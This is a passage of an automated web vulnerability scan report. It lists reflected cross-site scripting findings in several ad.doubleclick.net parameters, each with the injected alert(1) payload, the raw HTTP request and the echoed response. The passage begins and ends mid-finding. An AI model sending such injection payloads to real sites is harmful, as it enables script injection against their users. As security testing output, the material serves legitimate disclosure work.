Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6781
Date: Tue, 28 Jun 2011 02:12:28 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
0%3B%7Efdr%3D242306880%3B0-0%3B0%3B65129193%3B4307-300/250%3B42514095/42531882/1%3Bu%3D18499500%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956ee414"-alert(1)-"0759993d50b&_et=1309227069&_a=18496939&_s=11683&_d=18498228&_c=18442163&_pm=97956&_pn=18499500&redirect=http%3a%2f%2flearn.strayeruniversity.edu/about");
var fscUrl = url;
var fscUrlClickTagFound = false;
var
...[SNIP]...

1.98. http://ad.doubleclick.net/adi/x1.rtb/strayer/ron [_et parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/strayer/ron

Issue detail

The value of the _et request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee567"-alert(1)-"51b02d198a9 was submitted in the _et parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/strayer/ron;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956&_et=1309227069ee567"-alert(1)-"51b02d198a9&_a=18496939&_s=11683&_d=18498228&_c=18442163&_pm=97956&_pn=18499500&redirect=;u=18499500;ord=1190345? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLPQ7CMAwG0I9fBfUabMhSGju1PXAFVuYmTjc2jsRBgbe_CTsAVxXp3sWIswfJpoOs-ErZZSsSPRepCfvHxe4TDv_RZG1tLEw8TEmjOsW8_JpwzKU6ZxsJR0BvCSfg80o4A-8nvuIopadzAAAA%26dst%3Dhttp%253A%252F%252Fwww.strayeruniversity.edu&_wp=AAABMNQDsar1ylgCruOiLneHdyKfuJ0WmEHGHg&_nv=1&_CDbg=18496939&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAKs9GgEAAAAAtEIaAQAAAACzZxkBAAAAAKxHGgEAAAAAUEgaAQAAAABRSBoBAAAAACJD7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA3NDRjOWM0OC0zMDlkLTRmN2UtODI5YS0wOTRmMjRkYzAyNDUkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAD04CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6781
Date: Tue, 28 Jun 2011 02:12:49 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
2306880%3B0-0%3B0%3B65129193%3B4307-300/250%3B42514095/42531882/1%3Bu%3D18499500%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956&_et=1309227069ee567"-alert(1)-"51b02d198a9&_a=18496939&_s=11683&_d=18498228&_c=18442163&_pm=97956&_pn=18499500&redirect=http%3a%2f%2flearn.strayeruniversity.edu/about");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque
...[SNIP]...

1.99. http://ad.doubleclick.net/adi/x1.rtb/strayer/ron [_o parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/strayer/ron

Issue detail

The value of the _o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c823"-alert(1)-"7422a3948b0 was submitted in the _o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/strayer/ron;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=184421361c823"-alert(1)-"7422a3948b0&_eo=97956&_et=1309227069&_a=18496939&_s=11683&_d=18498228&_c=18442163&_pm=97956&_pn=18499500&redirect=;u=18499500;ord=1190345? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLPQ7CMAwG0I9fBfUabMhSGju1PXAFVuYmTjc2jsRBgbe_CTsAVxXp3sWIswfJpoOs-ErZZSsSPRepCfvHxe4TDv_RZG1tLEw8TEmjOsW8_JpwzKU6ZxsJR0BvCSfg80o4A-8nvuIopadzAAAA%26dst%3Dhttp%253A%252F%252Fwww.strayeruniversity.edu&_wp=AAABMNQDsar1ylgCruOiLneHdyKfuJ0WmEHGHg&_nv=1&_CDbg=18496939&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAKs9GgEAAAAAtEIaAQAAAACzZxkBAAAAAKxHGgEAAAAAUEgaAQAAAABRSBoBAAAAACJD7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA3NDRjOWM0OC0zMDlkLTRmN2UtODI5YS0wOTRmMjRkYzAyNDUkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAD04CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6781
Date: Tue, 28 Jun 2011 02:12:07 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
%3D18499500%3B%7Efdr%3D242306880%3B0-0%3B0%3B65129193%3B4307-300/250%3B42514095/42531882/1%3Bu%3D18499500%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=184421361c823"-alert(1)-"7422a3948b0&_eo=97956&_et=1309227069&_a=18496939&_s=11683&_d=18498228&_c=18442163&_pm=97956&_pn=18499500&redirect=http%3a%2f%2flearn.strayeruniversity.edu/about");
var fscUrl = url;
var fscUrlClickTagFound = fa
...[SNIP]...

1.100. http://ad.doubleclick.net/adi/x1.rtb/strayer/ron [_pm parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/strayer/ron

Issue detail

The value of the _pm request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 870d7"-alert(1)-"e17bcc3401c was submitted in the _pm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/strayer/ron;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956&_et=1309227069&_a=18496939&_s=11683&_d=18498228&_c=18442163&_pm=97956870d7"-alert(1)-"e17bcc3401c&_pn=18499500&redirect=;u=18499500;ord=1190345? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLPQ7CMAwG0I9fBfUabMhSGju1PXAFVuYmTjc2jsRBgbe_CTsAVxXp3sWIswfJpoOs-ErZZSsSPRepCfvHxe4TDv_RZG1tLEw8TEmjOsW8_JpwzKU6ZxsJR0BvCSfg80o4A-8nvuIopadzAAAA%26dst%3Dhttp%253A%252F%252Fwww.strayeruniversity.edu&_wp=AAABMNQDsar1ylgCruOiLneHdyKfuJ0WmEHGHg&_nv=1&_CDbg=18496939&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAKs9GgEAAAAAtEIaAQAAAACzZxkBAAAAAKxHGgEAAAAAUEgaAQAAAABRSBoBAAAAACJD7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA3NDRjOWM0OC0zMDlkLTRmN2UtODI5YS0wOTRmMjRkYzAyNDUkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAD04CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6781
Date: Tue, 28 Jun 2011 02:14:36 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
42531882/1%3Bu%3D18499500%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956&_et=1309227069&_a=18496939&_s=11683&_d=18498228&_c=18442163&_pm=97956870d7"-alert(1)-"e17bcc3401c&_pn=18499500&redirect=http%3a%2f%2flearn.strayeruniversity.edu/about");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

...[SNIP]...

1.101. http://ad.doubleclick.net/adi/x1.rtb/strayer/ron [_pn parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/strayer/ron

Issue detail

The value of the _pn request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a245"-alert(1)-"cb1a8ffbfb9 was submitted in the _pn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/strayer/ron;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956&_et=1309227069&_a=18496939&_s=11683&_d=18498228&_c=18442163&_pm=97956&_pn=184995007a245"-alert(1)-"cb1a8ffbfb9&redirect=;u=18499500;ord=1190345? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLPQ7CMAwG0I9fBfUabMhSGju1PXAFVuYmTjc2jsRBgbe_CTsAVxXp3sWIswfJpoOs-ErZZSsSPRepCfvHxe4TDv_RZG1tLEw8TEmjOsW8_JpwzKU6ZxsJR0BvCSfg80o4A-8nvuIopadzAAAA%26dst%3Dhttp%253A%252F%252Fwww.strayeruniversity.edu&_wp=AAABMNQDsar1ylgCruOiLneHdyKfuJ0WmEHGHg&_nv=1&_CDbg=18496939&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAKs9GgEAAAAAtEIaAQAAAACzZxkBAAAAAKxHGgEAAAAAUEgaAQAAAABRSBoBAAAAACJD7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA3NDRjOWM0OC0zMDlkLTRmN2UtODI5YS0wOTRmMjRkYzAyNDUkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAD04CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6781
Date: Tue, 28 Jun 2011 02:14:57 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
u%3D18499500%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956&_et=1309227069&_a=18496939&_s=11683&_d=18498228&_c=18442163&_pm=97956&_pn=184995007a245"-alert(1)-"cb1a8ffbfb9&redirect=http%3a%2f%2flearn.strayeruniversity.edu/about");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWind
...[SNIP]...

1.102. http://ad.doubleclick.net/adi/x1.rtb/strayer/ron [_s parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/strayer/ron

Issue detail

The value of the _s request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42d25"-alert(1)-"54e88c0450 was submitted in the _s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/strayer/ron;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956&_et=1309227069&_a=18496939&_s=1168342d25"-alert(1)-"54e88c0450&_d=18498228&_c=18442163&_pm=97956&_pn=18499500&redirect=;u=18499500;ord=1190345? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLPQ7CMAwG0I9fBfUabMhSGju1PXAFVuYmTjc2jsRBgbe_CTsAVxXp3sWIswfJpoOs-ErZZSsSPRepCfvHxe4TDv_RZG1tLEw8TEmjOsW8_JpwzKU6ZxsJR0BvCSfg80o4A-8nvuIopadzAAAA%26dst%3Dhttp%253A%252F%252Fwww.strayeruniversity.edu&_wp=AAABMNQDsar1ylgCruOiLneHdyKfuJ0WmEHGHg&_nv=1&_CDbg=18496939&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAKs9GgEAAAAAtEIaAQAAAACzZxkBAAAAAKxHGgEAAAAAUEgaAQAAAABRSBoBAAAAACJD7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA3NDRjOWM0OC0zMDlkLTRmN2UtODI5YS0wOTRmMjRkYzAyNDUkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAD04CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6777
Date: Tue, 28 Jun 2011 02:13:32 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
5129193%3B4307-300/250%3B42514095/42531882/1%3Bu%3D18499500%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956&_et=1309227069&_a=18496939&_s=1168342d25"-alert(1)-"54e88c0450&_d=18498228&_c=18442163&_pm=97956&_pn=18499500&redirect=http%3a%2f%2flearn.strayeruniversity.edu/about");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var
...[SNIP]...

1.103. http://ad.doubleclick.net/adi/x1.rtb/strayer/ron [redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/strayer/ron

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92266"-alert(1)-"754641c9b37 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/strayer/ron;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956&_et=1309227069&_a=18496939&_s=11683&_d=18498228&_c=18442163&_pm=97956&_pn=18499500&redirect=92266"-alert(1)-"754641c9b37 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLPQ7CMAwG0I9fBfUabMhSGju1PXAFVuYmTjc2jsRBgbe_CTsAVxXp3sWIswfJpoOs-ErZZSsSPRepCfvHxe4TDv_RZG1tLEw8TEmjOsW8_JpwzKU6ZxsJR0BvCSfg80o4A-8nvuIopadzAAAA%26dst%3Dhttp%253A%252F%252Fwww.strayeruniversity.edu&_wp=AAABMNQDsar1ylgCruOiLneHdyKfuJ0WmEHGHg&_nv=1&_CDbg=18496939&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAKs9GgEAAAAAtEIaAQAAAACzZxkBAAAAAKxHGgEAAAAAUEgaAQAAAABRSBoBAAAAACJD7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA3NDRjOWM0OC0zMDlkLTRmN2UtODI5YS0wOTRmMjRkYzAyNDUkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAD04CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6667
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 28 Jun 2011 02:15:09 GMT
Expires: Tue, 28 Jun 2011 02:15:09 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
3B%3B%7Esscs%3D%3fhttp://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245&_o=18442136&_eo=97956&_et=1309227069&_a=18496939&_s=11683&_d=18498228&_c=18442163&_pm=97956&_pn=18499500&redirect=92266"-alert(1)-"754641c9b37http://learn.strayeruniversity.edu/about");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
v
...[SNIP]...

1.104. http://ad.doubleclick.net/adi/x1.rtb/strayer/ron [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/strayer/ron

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb6a7"-alert(1)-"38985baca84 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/strayer/ron;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=744c9c48-309d-4f7e-829a-094f24dc0245bb6a7"-alert(1)-"38985baca84&_o=18442136&_eo=97956&_et=1309227069&_a=18496939&_s=11683&_d=18498228&_c=18442163&_pm=97956&_pn=18499500&redirect=;u=18499500;ord=1190345? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bn.xp1.ru4.com/nf?_pnot=0&_tpc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLPQ7CMAwG0I9fBfUabMhSGju1PXAFVuYmTjc2jsRBgbe_CTsAVxXp3sWIswfJpoOs-ErZZSsSPRepCfvHxe4TDv_RZG1tLEw8TEmjOsW8_JpwzKU6ZxsJR0BvCSfg80o4A-8nvuIopadzAAAA%26dst%3Dhttp%253A%252F%252Fwww.strayeruniversity.edu&_wp=AAABMNQDsar1ylgCruOiLneHdyKfuJ0WmEHGHg&_nv=1&_CDbg=18496939&_eo=97956&_sm=0&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAKs9GgEAAAAAtEIaAQAAAACzZxkBAAAAAKxHGgEAAAAAUEgaAQAAAABRSBoBAAAAACJD7EEAAAAAAADwPwAAAAAAAAAApH4BAAAAAACjLQAAAAAAAKR-AQAAAAAAJAAAAAAAAAA3NDRjOWM0OC0zMDlkLTRmN2UtODI5YS0wOTRmMjRkYzAyNDUkAAAAAAAAAGZiNjAwY2EwLTUxMzctNGM4ZC1lOTNjLWFmZWFiNjcxNTgxOBQAAAAAAAAAQUctMDAwMDAwMDEzODkzNTg1NTQPAAAAAAAAADE3My4xOTMuMjE0LjI0MwcAAAAAAAAAMzAweDI1MBoAAAAAAAAAaHR0cDovL3d3dy5tYXJrZXRidXk1NC5jb20zAAAAAAAAAGI0YWJiZTYzJTJEM2U4NyUyRDdkNTklMkRkMTZlJTJEODQzZDEyNTkzMDhlXl40MjA5MwEAAAAAAAAANAYAAAAcAAAAAAAAAAAAAAAAAAAAAD04CU4AAAAA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

